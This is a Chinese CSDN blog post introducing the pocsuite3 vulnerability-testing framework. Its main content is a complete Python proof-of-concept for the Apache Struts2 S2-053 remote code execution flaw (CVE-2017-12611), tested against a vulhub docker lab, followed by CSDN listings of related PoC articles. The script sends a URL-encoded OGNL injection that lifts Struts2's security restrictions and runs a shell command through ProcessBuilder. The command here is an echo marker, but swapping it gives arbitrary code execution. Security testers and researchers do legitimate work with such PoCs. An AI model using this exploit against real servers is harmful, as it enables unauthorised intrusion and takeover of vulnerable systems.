基于pocsuite3框架下的Struts2远程代码执行poc

最新推荐文章于 2024-05-29 23:35:24 发布
最新推荐文章于 2024-05-29 23:35:24 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: Python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43886632/article/details/103729627
版权

0x00 pocsuite介绍

Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。
windows下安装 命令 pip3 install pocsuite3
然后在cmd下输入pocsuite,如图所示成功安装。
在这里插入图片描述0x01Struts2_053POC

# -*- coding:utf-8 -*-

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from urllib.parse import urljoin
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = "CVE-2017-12611"
    version ='2.0.1-2.3.33,2.5-2.5.10'
    author = ["php00py"]
    vulDate = "2019-12-27"
    createDate = "2019-12-27"
    updateDate = "2019-12-27"
    references =["https://vulhub.org/#/environments/struts2/s2-053/"]
    name ="S2-053 Remote Code Execution Vulnerablity"
    appPowerLink = ''
    appName = 'Strute2'
    appVersion = '2.x'
    vulType = 'RCE'
    desc = '''
    struts2-053远程代码执行漏洞
    '''
    samples = []
    install_requires = ['']

    def _verify(self):
        result ={}
        path ="/hello.action"
        url = urljoin(self.url, path)
        payload = "redirectUri=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27echo+%22php00py%22%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D%0D%0A"
        headers = {
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0',
                    'Content-Type': 'application/x-www-form-urlencoded'
                    }
        rr = requests.post(url=url,headers=headers,data=payload)
        try:
            if "php00py" in rr.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        return self._verify()
register_poc(DemoPOC)

在这里插入图片描述环境是自己用docker搭建的环境。
https://github.com/vulhub/vulhub/tree/master/struts2/s2-053

0x03 pocsuite开发说明

https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

php00py
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pocsuite3框架编写php_xxe的poc
willow_liang的博客
10-16 296
pocsuite3框架编写php_xxe的poc 环境地址:php_xxe py脚本 from collections import OrderedDict from urllib.parse import urljoin import re from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE from pocsuite3.api import REVERSE_PAYLOAD
Pocsuite3编写poc——以Grafana任意文件读取为例
weixin_44522540的博客
09-06 1484
pocsuite3
开发实战(7)--渗透测试pocsuite3框架二开
最新发布
记录开发和安全学习过程中的点点滴滴
05-29 905
Pocsuite3是一款开源的远程漏洞测试框架Pocsuite3由知道创宇404实验室开发,旨在提供一个高效、灵活的平台,用于远程漏洞扫描和利用。该工具自2015年开源以来,经过不断的更新和迭代,已成为安全研究人员和渗透测试人员的重要工具.下面是两篇对Pocsuite3详细利用的介绍文章,如果需要进一步使用的朋友可以看下面的两篇文章,本篇文章金介绍对框架的二开
使用Pocsuite3框架并编写简单PoC例子
情感博主V
01-13 6241
简介和安装 Pocsuite3简介和安装 PoC编写基本规则 在此框架下,有编写其POC的指定规则 以CMSEasy5.5的SQL注入漏洞PoC为例 1、首先创建.py文件,命名规则: PoC命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名称中的所有字母改成小写,所有的符号改成_. 文件 例子的.py文件名为:_88979_cmseasy_5_5_sql_injection....
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
使用Pocsuite3
weixin_44110913的博客
08-18 1313
简介和安装 在此框架下,有编写其POC的指定规则 以CMSEasy5.5的SQL注入漏洞PoC为例 1、首先创建.py文件,命名规则: PoC命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名称中的所有字母改成小写,所有的符号改成_. 文件 例子的.py文件名为:_88979_cmseasy_5_5_sql_injection.py 2、PoC如下: poc参考地址 #导入所写PoC所需要类/文件,尽量不要使用第三方模块。 #迫不得已使用第三方模块有其依赖规则,后面给出。 from poc
向日葵远程代码执行poc.zip
04-05
向日葵远程代码执行漏洞(SUNBEAM Remote Code Execution)是网络安全领域中一个重要的安全隐患,主要涉及到向日葵远程控制软件。这个软件允许用户在不同的设备之间进行远程桌面控制、文件传输等一系列操作,但如果...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
Struts2 S2-029远程代码执行漏洞初探1
08-08
之前的 Struts2 远程代码执行 POC,一般是通过修改 StaticMethodAccess 或是创建 ProcessBuilder 对象来执行恶意代码。 然而,现在的 Struts 封装的 xwork 中的 OGNL 已经加强了安全校验。allowStaticMethodAccess ...
some_pocsuite:用于漏洞排查的pocsuite3验证POC代码
05-23
some_pocsuite用于企业内部进行漏洞排查与验证的的pocsuite3验证POC代码pocsuite3是知道创宇安全团队的开源漏洞测试框架)。由于原Pocsuite已停止更新,因此将原来的POC代码全部重新改写并迁移到pocsuite3,原POC...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在此展示全面的技术研究:其影响、可利用的场景和缓解措施。 该漏洞已在最近的 ...
pocsuite3pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试框架
02-05
pocsuite3 法律免责声明 未经事先双方同意,使用Pocsuite攻击目标是非法的。 pocsuite仅用于安全测试 法律免责声明 事先事先双方同意,使用pocsuite攻击目标是非法的。 pocsuite仅用于安全测试目的 总览 pocsuite3是由开发的开源远程漏洞测试和概念验证开发框架。 它带有强大的概念验证引擎,以及针对最终渗透测试人员和安全研究人员的许多强大功能。 产品特点 PoC脚本可以以不同的方式在attack , verify , shell模式下运行 插件生态系统 从任何位置(本地文件,redis,数据库,Seebug ...)动态加载PoC脚本 从任何位置(CIDR
[附POC]Apache Struts2最新(CVE-2017-5638,S02-45)POC
weixin_33806914的博客
03-08 306
#! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers def poc():     register_openers()     dat...
利用pocsuite3复现CVE-2021-22005
Jietewang的博客
10-20 3563
目录 0x01 漏洞简介 0x02 影响范围 0x03 复现过程 0x01 漏洞简介 2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。 其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8。能够网络访问vCenter Server 上的 443 端口的攻
漏洞复现-Struts2-s2-057&&POC
qq_59350385的博客
05-17 1437
目录 环境搭建 复现工具 复现过程 (1)验证漏洞是否存在 (2)利用已有的POC(exp)复现 POC编写 PoC 编写流程 Poc编写涉及到的一些库 Web漏洞Poc编写基本方法 环境搭建 漏洞部署使用docker,源码下载链接https://github.com/vulhub/vulhub/tree/master/struts2/s2-057 启动环境: docker-compose up -d 访问:http://your-ip:8080/struts2-sho..
使用pocsuite3模块编写poc脚本
H4ppyD0g的博客
09-11 1346
pocsuite3是由知道创宇404实验室开发维护的开源远程漏洞测试和概念验证开发框架,基于python3。poc脚本可以运行在 attack,verify, shell 等模式下。
pocsuite3poc
黑面狐
04-09 5575
知道创宇的pocsuite3更新了。 https://github.com/knownsec/pocsuite3 一、安装 安装p'ython3.4以上 pip3 install pocsuite3 安装完成后 控制台输入pocsuite,如下结果就是安装成功了 二、poc测试 写一个很简单的poc测试flask的ssti漏洞 from pocsuite3.api im...
POCsuite与goland实现华为HG532路由器命令注入CVE-2017-17215 POC
afei001
11-02 757
POCsuite与goland实现华为HG532路由器命令注入CVE-2017-17215 POC
Pocsuite3的使用
Qeminco的博客。
01-03 4456
简介 Pocsuite3官方介绍及下载链接 pocsuite3安装 在pocsuite3目录下进入命令窗口。 在使用之前你可能需要安装以下python库。 pip install chardet pip install termcolor pip install colorlog pip install socks pip install prettytable pip install faker 然后在pocsuite3目录下执行python cli.py -h 如果出现报错信息ModuleNotFou
Struts2 S2-029漏洞分析:远程代码执行机制
"本文主要探讨了Struts2框架中的S2-029远程代码执行漏洞,该漏洞利用了Struts2对OGNL表达式的不安全处理。文章介绍了Struts2标签库的工作原理,以及如何通过OGNL进行数据访问。同时,文章分析了触发该漏洞的途径和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值